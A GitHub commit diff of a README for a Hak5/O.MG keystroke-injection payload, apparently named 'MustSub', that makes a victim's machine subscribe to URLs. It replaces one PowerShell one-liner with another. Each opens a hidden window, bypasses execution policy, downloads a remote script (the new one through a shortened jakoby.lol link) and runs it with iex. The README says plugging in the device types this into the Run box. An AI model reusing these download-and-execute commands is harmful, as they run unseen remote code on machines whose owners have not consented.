Update Readme.md

This commit is contained in:
I-Am-Jakoby 2022-12-18 16:53:59 -06:00 committed by GitHub
parent 0a36c7672e
commit 8aec18eebd
No known key found for this signature in database
GPG key ID: 4AEE18F83AFDEB23

View file

@ -45,7 +45,7 @@ each URL will be passed through the subscribe function
* Plug in your device * Plug in your device
* Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload * Invoke-WebRequest will be entered in the Run Box to download and execute the dependencies and payload
``` ```
powershell -w h -NoP -NonI -Exec Bypass $pl = iwr https://raw.githubusercontent.com/I-Am-Jakoby/hak5-submissions/main/OMG/Payloads/OMG-MustSub/MustSub.ps1?dl=1; invoke-expression $pl powershell -w h -NoP -NonI -Ep Bypass iwr jakoby.lol/14q | iex
``` ```
<p align="right">(<a href="#top">back to top</a>)</p> <p align="right">(<a href="#top">back to top</a>)</p>